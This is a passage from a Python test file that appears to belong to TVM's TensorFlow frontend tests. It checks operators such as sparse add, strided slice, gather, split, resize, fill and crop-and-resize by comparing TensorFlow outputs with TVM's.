with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(
indices=indices, values=np.array(values).astype(dtype), dense_shape=A_shape
)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
# TODO(ANSHUMAN87): support user input threashold values
if flip:
if package_version.parse(tf.VERSION) < package_version.parse("1.13.0"):
result = tf.sparse.add(B, A_sp, thresh=0)
else:
result = tf.sparse.add(B, A_sp, threshold=0)
else:
if package_version.parse(tf.VERSION) < package_version.parse("1.13.0"):
result = tf.sparse.add(A_sp, B, thresh=0)
else:
result = tf.sparse.add(A_sp, B, threshold=0)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name, no_gpu=True)
def test_sparse_add():
"""sparse.add op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
for dtype_inp in ["float32", "float64", "int32"]:
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp)
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp, True)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp, True)
#######################################################################
# StridedSlice
# ------------
def _test_stridedslice(
ip_shape,
begin,
end,
stride,
dtype,
begin_mask=0,
end_mask=0,
new_axis_mask=0,
shrink_axis_mask=0,
ellipsis_mask=0,
):
"""One iteration of a Stridedslice"""
tf.reset_default_graph()
np_data = np.random.uniform(size=ip_shape).astype(dtype)
with tf.Graph().as_default():
if len(ip_shape) == 0:
in_data = tf.constant(np_data, dtype)
else:
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.strided_slice(
in_data,
begin,
end,
stride,
begin_mask=begin_mask,
end_mask=end_mask,
new_axis_mask=new_axis_mask,
shrink_axis_mask=shrink_axis_mask,
ellipsis_mask=ellipsis_mask,
name="strided_slice",
)
if len(ip_shape) == 0:
compare_tf_with_tvm(None, "", "strided_slice:0")
else:
compare_tf_with_tvm(np_data, "in_data:0", "strided_slice:0")
def test_forward_stridedslice():
"""test StridedSlice"""
_test_stridedslice([], [0], [0], [1], "float32", new_axis_mask=1)
_test_stridedslice([2], [1], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([4], [-1], [0], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 1], [0], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 3, 4], [-2], [0], [1], "float32", shrink_axis_mask=8)
_test_stridedslice([2, 3, 4], [0], [1], [1], "float32", shrink_axis_mask=8)
_test_stridedslice([3, 4, 3], [1, -1, 0], [4, -5, 3], [2, -1, 1], "float32")
_test_stridedslice([3, 4, 3], [1, 0], [4, 3], [2, 1], "float32", ellipsis_mask=8)
_test_stridedslice([3, 4, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0, 1], [4, 2, 2], [2, 1, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 3], [1, 1, 0], [4, 4, 2], [2, 1, 1], "float32", new_axis_mask=5)
_test_stridedslice(
[3, 4, 3], [1, 1, 1], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=4
)
_test_stridedslice(
[6, 4, 5], [1, 1, 1], [6, 3, 4], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=5
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=4, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=2
)
_test_stridedslice((3, 4), [1, 0], [4, 4], [1, 1], "float32", shrink_axis_mask=2)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=1, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6], [0, 0], [2, 3], [1, 1], "float32", shrink_axis_mask=5, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=5,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=8,
end_mask=8,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=16,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[1, 2, 0, -3],
[4, 5, 3, 3],
[2, 2, 1, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=8,
)
_test_stridedslice(
[1, 13, 13, 3, 2],
[0, 0],
[1, 1],
[1, -1],
"float32",
ellipsis_mask=1,
begin_mask=2,
end_mask=2,
)
#######################################################################
# FloorDiv, RealDiv
# -----------------
def _test_forward_divide(ip_shape, dtype):
np_numer = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_denomin = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
denominator = tf.placeholder(dtype, ip_shape, name="denomin")
tf.math.divide(numerator, denominator, name="RealDiv")
compare_tf_with_tvm([np_numer, np_denomin], ["numer:0", "denomin:0"], "RealDiv:0")
def _test_forward_floordiv(ip_shape, dtype):
np_numer = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
tf.math.floordiv(numerator, tf.constant(5, dtype=dtype), name="FloorDiv")
compare_tf_with_tvm([np_numer], ["numer:0"], "FloorDiv:0")
def test_forward_divide():
"""test FloorDiv, RealDiv"""
_test_forward_divide((4,), "int32")
_test_forward_divide((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "int32")
#######################################################################
# FloorMod
# --------
def _test_forward_floormod(in_shape, if_shape, dtype):
np_numer = np.random.uniform(1, 100, size=in_shape).astype(dtype)
np_factor = np.random.uniform(1, 100, size=if_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, in_shape, name="numer")
factor = tf.placeholder(dtype, if_shape, name="factor")
tf.floormod(numerator, factor, name="FloorMod")
compare_tf_with_tvm([np_numer, np_factor], ["numer:0", "factor:0"], "FloorMod:0")
def test_forward_floormod():
"""test FloorMod"""
_test_forward_floormod((10,), (10,), "float32")
_test_forward_floormod((8, 2), (1,), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "int32")
#######################################################################
# TruncateMod
# -----------
def _test_forward_truncatemod(ip_shape, dtype):
np_data_1 = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_data_2 = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data_1 = tf.placeholder(dtype, ip_shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, ip_shape, name="in_data_2")
tf.truncatemod(in_data_1, in_data_2, name="truncatemod")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "truncatemod:0")
def test_forward_truncatemod():
"""test TruncateMod"""
_test_forward_truncatemod((4, 3, 7), "int32")
#######################################################################
# Gather, GatherV2
# --------------------------
def _test_gather(ip_shape, indice_shape, indice_value, axis, batch_dims, dtype):
"""One iteration of a GatherV2"""
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
indices = tf.placeholder("int32", indice_shape, name="indices")
out = tf.gather(in_data, indices, axis=axis, batch_dims=batch_dims)
np_data = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
def _fill_indices(indice_value):
indices = np.array(ip_shape, dtype=dtype)
if isinstance(indice_value, int):
indices = np.array([indice_value], dtype="int32")
else:
indices = np.asarray(indice_value, dtype="int32")
return indices
np_indices = _fill_indices(indice_value)
compare_tf_with_tvm([np_data, np_indices], ["in_data:0", "indices:0"], out.name)
def test_forward_gather():
"""test Gather/GatherV2 layer"""
_test_gather((4,), (1,), 1, 0, 1, "int32")
_test_gather((4,), (1,), 1, 0, 0, "float32")
_test_gather((1, 4), (1,), [0], 0, 0, "int32")
_test_gather((4,), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "float32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 1, 0, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "float32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 0, 0, "int32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 2, 0, "int32")
_test_gather((4, 3, 5, 6), (1, 4), [[2, 1, 0, 0]], 0, 0, "float32")
_test_gather((2, 2), (2, 2), [[0, 0], [0, 0]], 1, 1, "float32")
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 2, 2, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 1, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 2, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 0, "float32"
)
#######################################################################
# GatherND
# --------------------------
def _test_gather_nd(ip_shape, indice_value, dtype):
"""test operator GatherNd"""
np_data = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.gather_nd(in_data, indices=indice_value, name="gather_nd")
compare_tf_with_tvm([np_data], ["in_data:0"], "gather_nd:0")
def test_forward_gather_nd():
"""test operator GatherNd"""
_test_gather_nd((2, 2), [[0, 0], [1, 1]], "float32")
_test_gather_nd((2, 2, 2), [[1, 0, 0], [0, 0, 0]], "float32")
_test_gather_nd((4,), [1], "float32")
_test_gather_nd((4,), [1], "int32")
_test_gather_nd((1, 4), [0, 3], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "float32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((4, 3, 5, 6), [[2, 1, 0, 0]], "float32")
_test_gather_nd((3, 3, 3), [[[2, 1]]], "int32")
#######################################################################
# BiasAdd
# -------
def test_forward_bias_add():
"""test Op BiasAdd"""
def check_bias_add(lh_shpae, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shpae).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.nn.bias_add(lft_data, rgt_data, name="BiasAdd")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "BiasAdd:0")
check_bias_add((10, 8, 16, 32), (32,), dtype="int32")
check_bias_add((10, 20), (20,), dtype="float32")
#######################################################################
# Split
# -----
def _test_split(in_shape, axis, num_or_size_splits, dtype):
np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
""" One iteration of a Split """
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
num_split = (
len(num_or_size_splits) if isinstance(num_or_size_splits, list) else num_or_size_splits
)
split = tf.split(in_data, num_or_size_splits, axis=axis)
relu = [tf.nn.relu(i) for i in split]
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in relu])
# and now test together with concat
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
splitted = tf.split(in_data, num_or_size_splits, axis=axis)
concat = tf.concat(splitted, axis)
compare_tf_with_tvm([np_data], "in_data:0", concat.name)
def test_forward_split():
"""test split layer"""
# rank 1
_test_split((3,), 0, 1, "float32")
_test_split((3,), 0, 3, "float32")
_test_split((6,), 0, 3, "float32")
# rank 2
_test_split((6, 2), 0, 3, "float32")
_test_split((2, 6), 1, 6, "float32")
# rank 3
_test_split((6, 2, 4), 0, 2, "int32")
_test_split((2, 6, 4), 1, 3, "float32")
_test_split((2, 4, 6), 2, 1, "float32")
# rank 4
_test_split((6, 1, 3, 5), 0, 3, "float32")
_test_split((1, 6, 3, 5), 1, 3, "float32")
_test_split((1, 3, 6, 5), 2, 3, "float32")
_test_split((1, 3, 5, 6), 3, 3, "float32")
# split along negative axis
_test_split((6, 1, 3, 5), -4, 3, "float32")
_test_split((1, 6, 3, 5), -3, 3, "float32")
_test_split((1, 3, 6, 5), -2, 3, "float32")
_test_split((1, 3, 5, 6), -1, 3, "float32")
# size_splits list
_test_split((6,), 0, [1, 2, 3], "int32")
_test_split((3, 6, 4), -2, [1, 4, 1], "float32")
######################################################################
# TopKV2
# ------
def _test_forward_top_k_v2(in_shape, k):
np_data = np.random.uniform(-100, 100, size=in_shape).astype("float32")
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder("float32", in_shape, name="in_data")
tf.math.top_k(in_data, k, name="TopK")
compare_tf_with_tvm([np_data], ["in_data:0"], "TopK:0")
def test_forward_top_k_v2():
_test_forward_top_k_v2((3,), 1)
_test_forward_top_k_v2((3,), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
#######################################################################
# Unstack
# -------
def _test_unstack(ip_shape, axis, dtype):
np_data = np.random.uniform(-5, 5, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
unstack = tf.unstack(in_data, axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in unstack])
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.stack(tf.unstack(in_data, axis=axis), axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], "stack:0")
def test_forward_unstack():
"""test unstack layer"""
_test_unstack((6,), 0, "int32")
_test_unstack((2, 6), 1, "float64")
# negative axis
_test_unstack((1, 4), -1, "int32")
_test_unstack((3, 6, 4), -2, "float32")
#######################################################################
# Tile
# ----
def _test_tile(in_shape, multiples, dtype):
np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.tile(in_data, multiples=multiples, name="tile")
compare_tf_with_tvm([np_data], ["in_data:0"], "tile:0")
def test_forward_tile():
"""test Tile"""
_test_tile((2,), (3,), "int32")
_test_tile((2, 2), (2, 3), "float32")
_test_tile((2, 4, 6), (6, 7, 8), "float64")
#######################################################################
# ClipByValue
# -----------
def _test_forward_clip_by_value(ip_shape, clip_value_min, clip_value_max, dtype):
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.clip_by_value(in_data, clip_value_min, clip_value_max, name="ClipByValue")
np_data = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
compare_tf_with_tvm([np_data], ["in_data:0"], "ClipByValue:0")
def test_forward_clip_by_value():
"""test ClipByValue op"""
if tf.__version__ < LooseVersion("1.9"):
_test_forward_clip_by_value((4,), 0.1, 5.0, "float32")
_test_forward_clip_by_value((4, 4), 1, 5, "int32")
#######################################################################
# Multi Input to graph
# --------------------
def test_forward_multi_input():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
out = tf.multiply(out1, out2, name="out")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
compare_tf_with_tvm(
[in_data, in_data, in_data, in_data], ["in1:0", "in2:0", "in3:0", "in4:0"], "out:0"
)
#######################################################################
# Multi Output to Graph
# ---------------------
def test_forward_multi_output():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
in_data = [in_data] * 4
in_name = ["in1:0", "in2:0", "in3:0", "in4:0"]
out_name = ["out1:0", "out2:0"]
out_node = [out.strip(":0") for out in out_name]
in_node = [inp.strip(":0") for inp in in_name]
with tf.Session() as sess:
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
tvm_output = run_tvm_graph(
final_graph_def, in_data, in_node, target="llvm", out_names=out_node, num_output=2
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Resize Bilinear, Nearest_Neighbor
# ---------------------------------
def _test_resize_bilinear(in_shape, to_shape, align_corners):
"""One iteration of resize bilinear"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_bilinear(in_data, shape_data, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_bilinear_from_tensor(in_shape, align_corners):
"""One iteration of resize bilinear with non-constant output shape, requires
value inference to get proper output shape."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], None, None, in_shape[3]], dtype=data.dtype
)
to_shape = tf.shape(in_data)[1:3]
tf.image.resize_bilinear(in_data, to_shape, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_nearest_neighbor(in_shape, to_shape):
"""One iteration of resize nearest neighbor"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_nearest_neighbor(in_data, shape_data, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def _test_resize_nearest_neighbor_dynamic_shape(in_shape, scale):
"""One iteration of resize nearest neighbor for graph with dynamic input shape"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=None, dtype=data.dtype)
# multiply input shape by scale factor
new_shape = tf.shape(in_data)[1:3] * tf.constant(scale, dtype=tf.int32)
tf.image.resize_nearest_neighbor(in_data, new_shape, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def test_forward_resize():
"""Resize Bilinear, Nearest_Neighbor"""
# TF default layout is NHWC
_test_resize_bilinear((4, 32, 32, 3), [50, 50], False)
_test_resize_bilinear((6, 32, 32, 3), [20, 20], True)
_test_resize_bilinear_from_tensor((4, 32, 32, 3), False)
_test_resize_bilinear_from_tensor((6, 50, 50, 3), True)
_test_resize_nearest_neighbor((6, 32, 32, 3), [20, 20])
_test_resize_nearest_neighbor_dynamic_shape((1, 16, 16, 3), scale=[2, 2])
#######################################################################
# BroadcastArgs
# -----------
def _test_broadcast_args(in_shape_1, in_shape_2):
"""One iteration of broadcast_args"""
shape_1 = np.array(in_shape_1).astype("int32")
shape_2 = np.array(in_shape_2).astype("int32")
with tf.Graph().as_default():
shape_1 = constant_op.constant(shape_1, shape=shape_1.shape, dtype=shape_1.dtype)
shape_2 = constant_op.constant(shape_2, shape=shape_2.shape, dtype=shape_2.dtype)
tf.raw_ops.BroadcastArgs(s0=shape_1, s1=shape_2)
compare_tf_with_tvm(None, "", "BroadcastArgs:0", opt_level=0)
def test_forward_broadcast_args():
"""Resize Bilinear"""
_test_broadcast_args((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_args((6, 32, 32, 1), [6, 32, 32, 16])
_test_broadcast_args((32, 32, 16), [6, 32, 32, 16])
#######################################################################
# BroadcastTo
# -----------
def _test_broadcast_to(in_shape, to_shape):
"""One iteration of broadcast_to"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0", opt_level=0)
def _test_broadcast_to_from_tensor(in_shape):
"""One iteration of broadcast_to with unknown shape at graph build"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=[None], dtype=data.dtype)
shape_data = tf.multiply(tf.shape(in_data), 32)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0")
def test_forward_broadcast_to():
"""Resize Bilinear"""
_test_broadcast_to((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_to((6, 32, 32, 1), [6, 32, 32, 16])
_test_broadcast_to_from_tensor((1))
#######################################################################
# Fill
# ----
def _test_fill(in_shape):
"""Use the fill op to create a tensor of ones with non-constant shape."""
with tf.Graph().as_default():
tf.ones(shape=in_shape, dtype="float32")
compare_tf_with_tvm(in_shape, [], "ones:0", opt_level=1)
def _test_fill_from_tensor(in_shape):
"""Use the fill op to create a tensor of ones with non-constant shape.
Some extra ops need to be added here to prevent the graph from
being fully constant and folded away."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], in_shape[1], None, None], dtype=data.dtype
)
x = tf.ones(shape=2 * tf.shape(in_data), dtype=data.dtype)
y = tf.math.add(in_data, tf.reduce_mean(x), name="out1")
compare_tf_with_tvm(data, "Placeholder:0", "out1:0")
def _test_fill_symbolic_inputs(in_shape_data, in_value_data, dtype):
with tf.Graph().as_default():
in_shape = tf.placeholder(shape=[in_shape_data.shape[0]], dtype=in_shape_data.dtype)
in_value = tf.placeholder(shape=(), dtype=dtype)
out = tf.fill(in_shape, in_value)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[in_shape_data, in_value_data], [in_shape.name, in_value.name], out.name, mode=mode
)
def test_forward_fill():
"""Resize Bilinear"""
_test_fill((32))
_test_fill((6, 32, 64, 64))
_test_fill_from_tensor((6, 32, 64, 64))
_test_fill_symbolic_inputs(np.array((2,)), np.int32(9), tf.int32)
_test_fill_symbolic_inputs(np.array((2, 3)), 9, tf.int64)
_test_fill_symbolic_inputs(np.array((2, 3, 4)), np.float32(9.0), tf.float32)
#######################################################################
# Crop to bounding box
# --------------------
def _test_crop(in_shape, off_h, off_w, tar_h, tar_w):
"""Crop to bounding box"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
tf.image.crop_to_bounding_box(in_data, off_h, off_w, tar_h, tar_w)
compare_tf_with_tvm(data, "Placeholder:0", "crop_to_bounding_box/Slice:0")
def test_forward_crop():
"""Crop to bounding box"""
_test_crop((1, 224, 224, 3), 20, 20, 120, 120)
#######################################################################
# CropAndResize
# -------------
def _test_forward_crop_and_resize(
img_shape,
boxes,
box_idx,
crop_size,
extrapolation_value=0.0,
method="bilinear",
dtype="float32",
):
image = np.random.uniform(0, 10, size=img_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = array_ops.placeholder(dtype, image.shape, name="in_data")
tf.image.crop_and_resize(
in_data,
boxes=boxes,
box_ind=box_idx,
crop_size=crop_size,
method=method,
extrapolation_value=extrapolation_value,
name="crop_and_resize",
)
compare_tf_with_tvm([image], ["in_data:0"], "crop_and_resize:0")
def test_forward_crop_and_resize():
"""CropAndResize"""
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3])
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2)
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2, "nearest")
_test_forward_crop_and_resize([1, 11, 11, 3], [[0.3, 0.3, 1, 1]], [0], [21, 21])
_test_forward_crop_and_resize([1, 41, 41, 3], [[0.2, 0.4, 0.8, 0.8]], [0], [21, 11])
_test_forward_crop_and_resize([1, 100, 100, 3], [[0, 0, 0.9, 0.9]], [0], [30, 30])
_test_forward_crop_and_resize([1, 224, 224, 3], [[0.1, 0.2, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 249, 249, 3], [[0, 0, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 201, 301, 3], [[0.2, 0.3, 0.7, 0.8]], [0], [51, 51])
_test_forward_crop_and_resize(
img_shape=[10, 11, 11, 3],
boxes=[[0, 0, 0.9, 0.9], [0.2, 0.2, 0.8, 0.8]],
box_idx=[0, 1],
crop_size=[5, 5],
)
_test_forward_crop_and_resize(
img_shape=[20, 576, 576, 3],
boxes=[[0, 0, 1, 1], [0, 0, 0.8, 0.8], [0.1, 0.2, 0.9, 1], [0.2, 0, 1, 1]],
box_idx=[1, 0, 2, 3],
crop_size=[24, 24],
extrapolation_value=0.3,
)
_test_forward_crop_and_resize(
img_shape=[20, 229, 229, 3],
boxes=[[0, 0, 0.9, 0.9], [0.3, 0.3, 1, 1], [0.2, 0.1, 0.7, 0.8], [0, 0, 1, 1]],
box_idx=[3, 0, 2, 1],
crop_size=[58, 58],
extrapolation_value=0.2,
method="nearest",
)
#######################################################################
# Non Max Suppression
# -------------------
def _test_forward_nms_v3(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="debug",
)
def _test_forward_nms_v4(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
